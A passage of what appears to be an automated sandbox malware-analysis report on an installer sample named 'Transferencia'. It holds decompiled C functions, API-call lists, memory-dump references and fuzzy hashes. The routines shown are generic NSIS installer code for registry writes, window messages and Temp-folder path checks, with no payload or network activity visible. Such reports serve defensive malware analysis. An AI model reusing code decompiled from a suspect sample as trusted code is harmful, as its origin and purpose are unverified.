                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                                                • Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
                                                • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                                                • Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E732A16BD(struct HINSTANCE__* _a4, short* _a8) {
                                                				_Unknown_base(*)()* _t7;
                                                				void* _t10;
                                                				int _t14;
                                                
                                                				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                				_t10 = GlobalAlloc(0x40, _t14);
                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                				_t7 = GetProcAddress(_a4, _t10);
                                                				GlobalFree(_t10);
                                                				return _t7;
                                                			}






                                                0x732a16d7
                                                0x732a16e3
                                                0x732a16f0
                                                0x732a16f7
                                                0x732a1700
                                                0x732a170c

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,732A22D8,?,00000808), ref: 732A16D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,732A22D8,?,00000808), ref: 732A16DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,732A22D8,?,00000808), ref: 732A16F0
                                                • GetProcAddress.KERNEL32(732A22D8,00000000), ref: 732A16F7
                                                • GlobalFree.KERNEL32 ref: 732A1700
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 647614b5df40037765a31dd91ffe66da210ae7f25890bce9ebf49d01578439e5
                                                • Instruction ID: b3d3dcf6b03ca8afd07075352b00a3b5b5cd20e1b561db90ad5274cce6d85dba
                                                • Opcode Fuzzy Hash: 647614b5df40037765a31dd91ffe66da210ae7f25890bce9ebf49d01578439e5
                                                • Instruction Fuzzy Hash: 9DF0A2731061387BD62126AB8C4CD9BBE9CDF8B2F5B214215FB1C9129085619D05F7F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401C43(intOrPtr __edx) {
                                                				int _t29;
                                                				long _t30;
                                                				signed int _t32;
                                                				WCHAR* _t35;
                                                				long _t36;
                                                				int _t41;
                                                				signed int _t42;
                                                				int _t46;
                                                				int _t56;
                                                				intOrPtr _t57;
                                                				struct HWND__* _t63;
                                                				void* _t64;
                                                
                                                				_t57 = __edx;
                                                				_t29 = E00402D84(3);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 - 0x18) = _t29;
                                                				_t30 = E00402D84(4);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 + 8) = _t30;
                                                				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                				}
                                                				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                					 *(_t64 + 8) = E00402DA6(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t61 = E00402DA6();
                                                					_t32 = E00402DA6();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t35 =  ~( *_t31) & _t61;
                                                					__eflags = _t35;
                                                					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                					goto L10;
                                                				} else {
                                                					_t63 = E00402D84();
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t41 = E00402D84(2);
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t56 =  *(_t64 - 0x1c) >> 2;
                                                					if(__eflags == 0) {
                                                						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                						L10:
                                                						 *(_t64 - 0x38) = _t36;
                                                					} else {
                                                						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                					_push( *(_t64 - 0x38));
                                                					E00406461();
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t64 - 4));
                                                				return 0;
                                                			}















                                                0x00401c43
                                                0x00401c45
                                                0x00401c4c
                                                0x00401c4f
                                                0x00401c52
                                                0x00401c5c
                                                0x00401c60
                                                0x00401c63
                                                0x00401c6c
                                                0x00401c6c
                                                0x00401c6f
                                                0x00401c73
                                                0x00401c7c
                                                0x00401c7c
                                                0x00401c7f
                                                0x00401c83
                                                0x00401c85
                                                0x00401cda
                                                0x00401cdc
                                                0x00401ce7
                                                0x00401cf1
                                                0x00401cf4
                                                0x00401cf4
                                                0x00401cfd
                                                0x00000000
                                                0x00401c87
                                                0x00401c8e
                                                0x00401c90
                                                0x00401c93
                                                0x00401c99
                                                0x00401ca0
                                                0x00401ca3
                                                0x00401ccb
                                                0x00401d03
                                                0x00401d03
                                                0x00401ca5
                                                0x00401cb3
                                                0x00401cbb
                                                0x00401cbe
                                                0x00401cbe
                                                0x00401ca3
                                                0x00401d06
                                                0x00401d09
                                                0x00401d0f
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 443c3db962ab0709f794cef0dd75cfbbc40298e4b9bc43596e0072424d6b1197
                                                • Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
                                                • Opcode Fuzzy Hash: 443c3db962ab0709f794cef0dd75cfbbc40298e4b9bc43596e0072424d6b1197
                                                • Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00404D23(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v68;
                                                				char _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				signed int _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t55;
                                                
                                                				_t23 = _a16;
                                                				_t53 = _a12;
                                                				_t44 = 0xffffffdc;
                                                				if(_t23 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t24 = _t53;
                                                					if(_t53 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t44 = 0xffffffdd;
                                                					}
                                                					if(_t53 < 0x400) {
                                                						_t44 = 0xffffffde;
                                                					}
                                                					if(_t53 < 0xffff3333) {
                                                						_t52 = 0x14;
                                                						asm("cdq");
                                                						_t24 = 1 / _t52 + _t53;
                                                					}
                                                					_t25 = _t24 & 0x00ffffff;
                                                					_t55 = _t24 >> 0;
                                                					_t46 = 0xa;
                                                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                				} else {
                                                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                					_t50 = 0;
                                                				}
                                                				_t31 = E00406557(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                				_t33 = E00406557(_t44, _t50, _t55,  &_v132, _t44);
                                                				_t34 = E00406557(_t44, _t50, 0x7a1f48, 0x7a1f48, _a8);
                                                				wsprintfW(_t34 + lstrlenW(0x7a1f48) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                				return SetDlgItemTextW( *0x7a7a38, _a4, 0x7a1f48);
                                                			}



















                                                0x00404d2c
                                                0x00404d31
                                                0x00404d39
                                                0x00404d3a
                                                0x00404d47
                                                0x00404d4f
                                                0x00404d50
                                                0x00404d52
                                                0x00404d54
                                                0x00404d56
                                                0x00404d59
                                                0x00404d59
                                                0x00404d60
                                                0x00404d66
                                                0x00404d66
                                                0x00404d6d
                                                0x00404d74
                                                0x00404d77
                                                0x00404d7a
                                                0x00404d7a
                                                0x00404d7e
                                                0x00404d8e
                                                0x00404d90
                                                0x00404d93
                                                0x00404d3c
                                                0x00404d3c
                                                0x00404d43
                                                0x00404d43
                                                0x00404d9b
                                                0x00404da6
                                                0x00404dbc
                                                0x00404dcd
                                                0x00404de9

                                                APIs
                                                • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                                                • wsprintfW.USER32 ref: 00404DCD
                                                • SetDlgItemTextW.USER32 ref: 00404DE0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                                                • Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
                                                • Opcode Fuzzy Hash: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                                                • Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                				void* _t20;
                                                				void* _t21;
                                                				int _t24;
                                                				int _t30;
                                                				intOrPtr _t33;
                                                				void* _t34;
                                                				intOrPtr _t37;
                                                				void* _t39;
                                                				void* _t42;
                                                
                                                				_t42 = __eflags;
                                                				_t33 = __edx;
                                                				_t30 = __ebx;
                                                				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                				_t34 = __eax;
                                                				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                				 *(_t39 - 0x44) = E00402DA6(2);
                                                				_t20 = E00402DA6(0x11);
                                                				 *(_t39 - 4) = 1;
                                                				_t21 = E00402E36(_t42, _t34, _t20, 2);
                                                				 *(_t39 + 8) = _t21;
                                                				if(_t21 != __ebx) {
                                                					_t24 = 0;
                                                					if(_t37 == 1) {
                                                						E00402DA6(0x23);
                                                						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
                                                					}
                                                					if(_t37 == 4) {
                                                						 *0x40b5c8 = E00402D84(3);
                                                						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                						_t24 = _t37;
                                                					}
                                                					if(_t37 == 3) {
                                                						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
                                                					}
                                                					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
                                                						 *(_t39 - 4) = _t30;
                                                					}
                                                					_push( *(_t39 + 8));
                                                					RegCloseKey();
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
                                                				return 0;
                                                			}












                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248d
                                                0x00402494
                                                0x0040249e
                                                0x004024a1
                                                0x004024aa
                                                0x004024b1
                                                0x004024b8
                                                0x004024bb
                                                0x004024c1
                                                0x004024cb
                                                0x004024cf
                                                0x004024da
                                                0x004024da
                                                0x004024e1
                                                0x004024eb
                                                0x004024f1
                                                0x004024f4
                                                0x004024f4
                                                0x004024f8
                                                0x00402504
                                                0x00402504
                                                0x0040251d
                                                0x0040251f
                                                0x0040251f
                                                0x00402522
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstC730.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nstC730.tmp,00000000,00000011,00000002), ref: 00402515
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstC730.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nstC730.tmp
                                                • API String ID: 2655323295-469808752
                                                • Opcode ID: 12168f80e921b5cc7eda85fa60d779498084ba5053d7a6b6976cb8c5581d4f01
                                                • Instruction ID: 3228b6dbd083cda5ecf055ca6763daeb969d91bf2f3b8010d8844d1cd476a235
                                                • Opcode Fuzzy Hash: 12168f80e921b5cc7eda85fa60d779498084ba5053d7a6b6976cb8c5581d4f01
                                                • Instruction Fuzzy Hash: CF117C71E00118BEEB11AFA5DE49EAEBAB8FF44758F11443BF504B61C1D7B88D409A68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00405EF1(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				signed int _t23;
                                                
                                                				E0040651A(0x7a4750, _a4);
                                                				_t21 = E00405E94(0x7a4750);
                                                				if(_t21 != 0) {
                                                					E004067A1(_t21);
                                                					if(( *0x7a8a78 & 0x00000080) == 0) {
                                                						L5:
                                                						_t23 = _t21 - 0x7a4750 >> 1;
                                                						while(1) {
                                                							_t11 = lstrlenW(0x7a4750);
                                                							_push(0x7a4750);
                                                							if(_t11 <= _t23) {
                                                								break;
                                                							}
                                                							_t12 = E00406850();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405E35(0x7a4750);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E00405DE9();
                                                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}








                                                0x00405efd
                                                0x00405f08
                                                0x00405f0c
                                                0x00405f13
                                                0x00405f1f
                                                0x00405f2f
                                                0x00405f31
                                                0x00405f49
                                                0x00405f4a
                                                0x00405f51
                                                0x00405f52
                                                0x00000000
                                                0x00000000
                                                0x00405f35
                                                0x00405f3c
                                                0x00405f44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f3c
                                                0x00405f54
                                                0x00000000
                                                0x00405f68
                                                0x00405f21
                                                0x00405f27
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f27
                                                0x00405f0e
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                                                  • Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstC730.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                                                  • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                                                  • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstC730.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
                                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstC730.tmp
                                                • API String ID: 3248276644-633924231
                                                • Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                                                • Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
                                                • Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                                                • Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405E94(WCHAR* _a4) {
                                                				WCHAR* _t5;
                                                				short* _t7;
                                                				WCHAR* _t10;
                                                				short _t11;
                                                				WCHAR* _t12;
                                                				void* _t14;
                                                
                                                				_t12 = _a4;
                                                				_t10 = CharNextW(_t12);
                                                				_t5 = CharNextW(_t10);
                                                				_t11 =  *_t12;
                                                				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                                					if(_t11 != 0x5c || _t12[1] != _t11) {
                                                						L10:
                                                						return 0;
                                                					} else {
                                                						_t14 = 2;
                                                						while(1) {
                                                							_t14 = _t14 - 1;
                                                							_t7 = E00405E16(_t5, 0x5c);
                                                							if( *_t7 == 0) {
                                                								goto L10;
                                                							}
                                                							_t5 = _t7 + 2;
                                                							if(_t14 != 0) {
                                                								continue;
                                                							}
                                                							return _t5;
                                                						}
                                                						goto L10;
                                                					}
                                                				} else {
                                                					return CharNextW(_t5);
                                                				}
                                                			}









                                                0x00405e9d
                                                0x00405ea4
                                                0x00405ea7
                                                0x00405ea9
                                                0x00405eaf
                                                0x00405ec7
                                                0x00405ee9
                                                0x00000000
                                                0x00405ecf
                                                0x00405ed1
                                                0x00405ed2
                                                0x00405ed5
                                                0x00405ed6
                                                0x00405edf
                                                0x00000000
                                                0x00000000
                                                0x00405ee2
                                                0x00405ee5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ee5
                                                0x00000000
                                                0x00405ed2
                                                0x00405ebe
                                                0x00000000
                                                0x00405ebf

                                                APIs
                                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstC730.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                                                • CharNextW.USER32(00000000), ref: 00405EA7
                                                • CharNextW.USER32(00000000), ref: 00405EBF
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nstC730.tmp, xrefs: 00405E95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: C:\Users\user\AppData\Local\Temp\nstC730.tmp
                                                • API String ID: 3213498283-469808752
                                                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
